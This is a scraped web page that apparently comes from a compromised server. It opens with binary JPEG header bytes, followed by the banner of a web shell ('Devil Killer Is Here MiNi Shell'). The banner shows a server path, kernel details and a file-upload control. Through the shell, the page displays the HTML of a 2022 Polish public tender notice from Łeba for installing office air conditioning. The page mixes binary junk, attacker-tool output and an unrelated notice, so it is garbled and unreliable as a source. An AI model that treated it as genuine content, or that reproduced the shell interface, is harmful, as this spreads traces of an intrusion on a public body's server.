JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220802/0028760401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Modernizacja budynku Urzędu Miejskiego - dostawa, montaż i uruchomienie systemu klimatyzacji w pomieszczeniach Urzędu Miejskiego w Łebie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Łeba</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979743</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kościuszki 90</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łeba</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">59 86 61 510</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">59 86 61 337</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@leba.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://leba.um.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja budynku Urzędu Miejskiego - dostawa, montaż i uruchomienie systemu klimatyzacji w pomieszczeniach Urzędu Miejskiego w Łebie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-afa23971-117a-11ed-a35f-e2885ab918a3</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00287604</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00010299/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Modernizacja budynku Urzędu Miejskiego - montaż systemu klimatyzacji pomieszczeń</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/leba <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/leba</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu platformy zakupowej<br/>dostępnej pod adresem: https://platformazakupowa.pl/pn/leba<br/>2. Zaleca się, aby Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, posiadał konto na<br/>platformie zakupowej. Rejestracja oraz logowanie dostępne jest pod adresem: https://platformazakupowa.pl/pn/leba Korzystanie z<br/>Platformy przez Wykonawcę jest bezpłatne.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu,<br/>opisane zostały w Regulaminie korzystania z platformy zakupowej dostępnym pod adresem: https://platformazakupowa.pl/strona/1-<br/>regulamin.<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>platformy zakupowej, określone w Regulaminie dostępnym pod adresem: https://platformazakupowa.pl/strona/1-regulamin.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i wycofania oferty oraz do<br/>komunikacji wynosi 150MB.<br/>6. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 pzp, podmiotowych środków dowodowych,<br/>przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu,<br/>przyjmuje się datę ich przekazania na platformę zakupową.<br/>7. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy i załączniki do oferty)<br/>odbywa się elektronicznie za pośrednictwem platformy zakupowej i formularza Wyślij wiadomość. Korespondencja przesłana za<br/>pomocą tego formularza nie może być szyfrowana. We wszelkiej korespondencji związanej z niniejszym postępowaniem<br/>Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP)<br/>8. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email:<br/>iwona.mielewczyk@leba.eu.<br/>9. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę jako<br/>załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych<br/>kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres email: iwona.mielewczyk@leba.eu. Sposób<br/>sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452).<br/>10. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1.<br/>administratorem Pani/Pana danych osobowych jest Urząd Miejski w Łebie, ul.Kościuszki 90, 84-360 Łeba, tel. 598661510;<br/>2.<br/>inspektorem ochrony danych osobowych w Urzędzie Miejskim w Łebie jest Pan Radosław Czyżewski, kontakt: adres e-mail:<br/>radoslaw.czyzewski@leba.eu, telefon 59 8661 510 wew. 44;<br/>3.<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem<br/>4.<br/>odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129 z<br/>późn. zm.), dalej „ustawa Pzp”;<br/>5.<br/>Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>6.<br/>obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>7.<br/>w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>8.<br/>posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.32.2022.IM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonawca obowiązany jest dostarczyć 6 jednostek zewnętrznych oraz 26 jednostek<br/>wewnętrznych (zgodnie z zał. 9 do SWZ). Zamawiający dopuszcza dostarczenie minimum 5<br/>jednostek zewnętrznych oraz minimum 24 jednostek wewnętrznych. Instalacje winne zapewniać<br/>możliwość schłodzenia powietrza w pomieszczeniu.<br/>2.2. Wykonawca obowiązany jest przedstawić proponowane przez niego rozwiązania w formie<br/>dokumentacji (opis, rysunki, schematy, itp.), uwzględniającej założenia Zamawiającego dla<br/>systemu klimatyzacji, zasilania i sterowania urządzeń. Przedstawione konkretne rozwiązania<br/>(z doborem urządzeń, systemów, technologii i materiałów, z uwzględnieniem wymagań<br/>Zamawiającego) Wykonawca winien zrealizować w kosztach oferty.<br/>2.3. Wykonawca zobowiązany jest uwzględnić wszelkie koszty związane z wykonaniem<br/>przedmiotu zamówienia, w tym wykonaniem: konstrukcji wsporczej pod jednostki zewnętrzne,<br/>montażem jednostek zewnętrznych i wewnętrznych, montażem instalacji chłodniczej,<br/>odprowadzenia skroplin, instalacji elektrycznej zasilającej urządzenia oraz instalacji sterującej,<br/>prac towarzyszących związanych z zabudową instalacji chłodniczej, odprowadzenia skroplin oraz<br/>elektrycznej i sterującej oraz uruchomienie klimatyzacji. a także koszty badań, pomiarów<br/>i sprawdzeń instalacji klimatyzacyjnej i instalacji elektrycznej oraz przeszkoleniem pracowników<br/>Zamawiającego w zakresie obsługi urządzeń.<br/>2.4. Wykonawca ma obowiązek wykonania konstrukcji stalowej zgodnie z załącznikiem 10, na<br/>której zostaną ustawione jednostki zewnętrzne.<br/>2.5 Wykonawca ma obowiązek dostarczenia najpóźniej w dniu odbioru końcowego m.in.<br/>inwentaryzacji powykonawczej instalacji wewnętrznej i zewnętrznej systemu klimatyzacji.<br/>3.1. Opis systemu:<br/>Przewidziano system składający się z klimatyzatorów z jednostkami wewnętrznymi typu<br/>podstropowego obsługiwanych przez 1 jednostkę zewnętrzną (multisplit). Dostarczone urządzenia,<br/>ich montaż, montaż przewodów oraz dostarczone wyposażenia muszą zapewniać:<br/>- prawidłową pracę oddalonych od siebie jednostek zewnętrznej i wewnętrznych<br/>- odporność na warunki i czynniki atmosferyczne,<br/>- pracę w trybie chłodzenia w I strefie klimatycznej Polski,<br/>- wymagane funkcje.<br/>Zestawienie wymaganych (podstawowych) urządzeń, układów i elementów:<br/>– Agregat zewnętrzny (skraplający) Jednostka zewnętrzna układu klimatyzacji montowana na<br/>dachu budynku sąsiedniego.<br/>– Klimatyzator podstropowy. Jednostka wewnętrzna układu klimatyzacji montowana<br/>w pomieszczeniach biurowych.<br/>– Pilot bezprzewodowy: 1 Pilot sterujący parametrami pracy klimatyzacji, montaż w miejscu<br/>wskazanym przez Użytkownika<br/>3.2. Uszczegółowienie dla systemu klimatyzacji<br/>Do chłodzenia pomieszczeń przyjęto jednostkę wewnętrzną typu podstropowego oraz jednostkę<br/>zewnętrzną typu multisplit, zapewniające odpowiednią temperaturę poprzez regulację ilości czynnika chłodniczego. Regulacja temperatury odbywa się poprzez sterowniki montowane<br/>bezpośrednio w pomieszczeniu. Ponadto w pomieszczeniu winne być zamontowane:<br/>1 bezprzewodowy pilot, umożliwiające bezproblemową regulację temperatury w pomieszczeniu wg<br/>różnych scenariuszy: wg czujnika w pilocie przewodowym. Agregat skraplający (jednostka<br/>zewnętrzna) winien być zamontowany na konstrukcji stalowej zlokalizowanej na dachu budynku<br/>sąsiedniego zgodnie z opracowaniem – Załącznik nr 10 do SWZ. Wszystkie jednostki należy<br/>montować zgodnie z dokumentacją techniczno-ruchową urządzeń oraz wymaganiami producenta.<br/>A. Wymagane parametry, funkcje i wyposażenie klimatyzatora:<br/>a) praca całoroczna,<br/>b) chłodzenie pomieszczenia w temperaturze zewnętrznej co najmniej 22°C,<br/>c) wydajność chłodzenia (nominalna) ˃ 2,1-5,1 kW,<br/>d) wskaźnik sezonowej efektywności energetycznej (SEER – tryb chłodzenia) ≥ 6,0<br/>e)zasilanie 230 lub 400 V, ~1 lub ~3, 50 Hz,<br/>f) wydatek powietrza na najniższym biegu ≥ 25 m3/min.,<br/>g) urządzenia klasy B w zakresie poziomu zakłóceń radiowych (wg normy PN-EN 55022 –<br/>Urządzenia informatyczne. Charakterystyka zaburzeń radioelektrycznych. Poziomy dopuszczalne i<br/>metody pomiarów.),<br/>h) certyfikat PZH,<br/>i) Funkcje i wyposażenie:<br/>– autodiagnostyka urządzeń,<br/>– agregat inweterowy (sprężarka z płynną regulacją wydajności w całym zakresie),<br/>– funkcja auto-restartu (samoczynne włączania klimatyzatora po powrocie napięcia-opcja),<br/>– filtry lub inne urządzenia usuwające zanieczyszczenia mechaniczne z powietrza<br/>recyrkulowanego w pomieszczeniu,<br/>– programowanie pracy: tygodniowej i 24-godzinnej,<br/>B. W przypadku konieczności dodatkowego wyposażenia układów klimatyzacyjnych w celu<br/>umożliwienia właściwego chłodzenia powietrza w pomieszczeniu przy temperaturze zewnętrznej<br/>co najmniej 22°C, Wykonawca obowiązany jest to wykonać w ramach oferty stosując rozwiązania<br/>producenta urządzeń.<br/>3.3. Wymagania wykonawcze<br/>– W przypadku kolizji z istniejącymi instalacjami zmianę prowadzenia przewodów ustalać na<br/>bieżąco w trakcie realizacji inwestycji w uzgodnieniu z Zamawiającym.<br/>– Z uwagi na brak możliwości pełnej inwentaryzacji należy liczyć się z występowaniem elementów<br/>budowlanych i instalacyjnych utrudniających prowadzenie przewodów i instalacji, w takim<br/>przypadku kolizje rozwiązywać należy z Zamawiającym na bieżąco.<br/>– Wszystkie stosowane przy realizacji przedmiotu zamówienia wyroby, materiały, urządzenia etc.<br/>winne posiadać znak budowlany B lub znak CE (dopuszczenie do stosowania) oraz odpowiednie<br/>deklaracje zgodności, aprobaty techniczne, certyfikaty.<br/>3.3.1 Instalacja freonowa:<br/>– Instalacja freonowa nie powinna być prowadzona w miejscach, w których nie ma możliwości jej<br/>sprawdzenia. Należy zapewnić swobodny dostęp (np. poprzez klapy lub drzwiczki rewizyjne) do<br/>elementów wymagających okresowej kontroli. Każde odstępstwo od tej zasady musi być<br/>uzgodnione z Zamawiającym.<br/>– Do wykonania instalacji freonowej dopuszcza się wyłącznie rury z miedzi (Cu-DHP) do instalacji<br/>rurowych wg PN-EN 12735-1 „Miedź i stopy miedzi. Rury miedziane okrągłe bez szwu stosowane<br/>w instalacjach klimatyzacyjnych i chłodniczych – Część 1: Rury do instalacji rurowych”. Rury winne<br/>być odtłuszczone i nadające się do ciśnień roboczych ≥ 3000 kPa.<br/>– Łączenie rur wykonać łącznikami fabrycznymi z miedzi lub brązu (nie dopuszcza się łączników<br/>mosiężnych) spełniającymi wymagania PN-EN 1254-5 „Miedź i stopy miedzi. Łączniki instalacyjne.<br/>Część 5: Łączniki do rur miedzianych z krótkimi końcówkami do kapilarnego lutowania twardego”<br/>w technologii lutowania twardego zgodnie z wymaganiami PN-EN 378-2+A2 „Instalacje ziębnicze i<br/>pompy ciepła. Wymagania dotyczące bezpieczeństwa i ochrony środowiska. Część 2:<br/>Projektowanie, wykonywanie, sprawdzanie, znakowanie i dokumentowanie”, z użyciem lutu<br/>twardego spełniającego wymagania PN-EN 1044 „Lutowanie twarde. Spoiwa” i topników wg PNEN<br/>1045 „Lutowanie twarde. Topniki do lutowania twardego. Klasyfikacja i techniczne warunki<br/>dostawy.”<br/>– Miejsca lutowane winne być właściwie i jednoznacznie oznakowane.<br/>– Zapewnić prawidłowy dobór średnic instalacji freonowe (uzależnione to jest od długości oraz<br/>wydajności chłodniczej lub cieplnej).<br/>– Dla średnic:<br/>6,35 mm i odcinka długości 50 m,<br/> 9,52 mm i odcinka długości 50 m,<br/>12,70 mm i odcinka długości 50 m,<br/>15,88 mm i odcinka długości 25 m,<br/>należy wykorzystać ciągłość rurociągu (jeden kawałek) - bez niepotrzebnych cięć i lutów/spawów.<br/>– Przewody łączące jednostkę wewnętrzną z zewnętrzną winne być prowadzone poziomo<br/>w białych plastikowych korytkach montażowych pod stropem. Mocowanie rur chłodniczych<br/>powinno wynikać z wytycznych technicznych dla danego przekroju i miejsca montażu;<br/>maksymalna odległość między punktami mocowania to 1,50 m.<br/>– Przejścia instalacji przez przegrody budowlane winne odbywać się przez tuleje ochronne,<br/>właściwie wykonane i uszczelnione (uszczelnienie trwale elastycznie).<br/>– Wszystkie przewody chłodnicze muszą być zaizolowane oddzielnie otuliną przeznaczoną do<br/>instalacji chłodniczych, zapobiegającą kondensacji pary wodnej na przewodach oraz<br/>przeciwdziałające korozji przewodów. Otulina winna ściśle przylegać do powierzchni izolowanych<br/>rur (dobór otuliny do średnicy izolowanego przewodu), zaś połączenie poszczególnych segmentów<br/>otuliny winne być ze sobą klejone. Materiał otuliny winien być dostosowany do stosowania<br/>w zakresie temperatur w przedziale od –50°C do + 150°C, zaś w przestrzeniach narażonych na<br/>światło słoneczne dodatkowo winien być odporny na promieniowanie UV (dopuszcza się tutaj<br/>użycie dodatkowej rury uchronnej odpornej na UV). Grubość otuliny zgodnie z wymaganiami<br/>producenta klimatyzatora, lecz nie mniejsza niż 13 mm. Mocowanie zaizolowanych rur np. do<br/>konstrukcji nośnej nie może powodować zgniecenia warstwy otuliny. Prawidłowe izolowanie<br/>dotyczy również miejsc gięć i połączeń rur. W przypadku prowadzenia rur zziębnych w odległości<br/>mniejszej niż 15 cm od rur centralnego ogrzewania wymaga się zastosowania dodatkowej (oprócz<br/>opisanej wyżej) otuliny izolującej cieplnie przewody freonowe.<br/>– Przy lutowaniu rur unikać ich przegrzewania, szczególnie przy mniejszych średnicach. Gięcie<br/>przewodów freonowych - zgodnie z dopuszczonymi przez producenta promieniami gięcia dla<br/>danego materiału i średnicy (nie dopuszcza się zmniejszenia światła przewodu w miejscach<br/>gięcia).<br/>Należy używać<br/>odpowiednich obcinaków krążkowych.<br/>– Przy połączeniach skręcanych nie dopuszcza się stosowania past uszczelniających.<br/>– Zabrania się pozostawiania instalacji niezabezpieczonych (otwarte końce rur).<br/>– Mocowanie elementów i urządzeń, w tym konstrukcje wsporcze, winne odpowiadać<br/>przenoszonym obciążeniom.<br/>– Przed napełnieniem instalacji przewody należy przedmuchać sprężonym azotem.<br/>– Próbę szczelności dla przewodów wykonać na ciśnienie 4,15 MPa (wymagany protokół z próby<br/>wykonanej w obecności Zamawiającego i/lub Użytkownika).<br/>– Przewody chłodnicze należy prawidłowo i czytelnie oznaczyć i opisać. Opisy te winne być<br/>zgodne ze schematami i dokumentacją powykonawczą.<br/>– Prawidłowe wykonanie odcinków rur i przewodów w przestrzeni między ścianą zewnętrzną<br/>budynku a jednostką zewnętrzną opisano w pkt. 3 wymagań. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45331230-7 - Instalowanie urządzeń chłodzących</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">84 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający 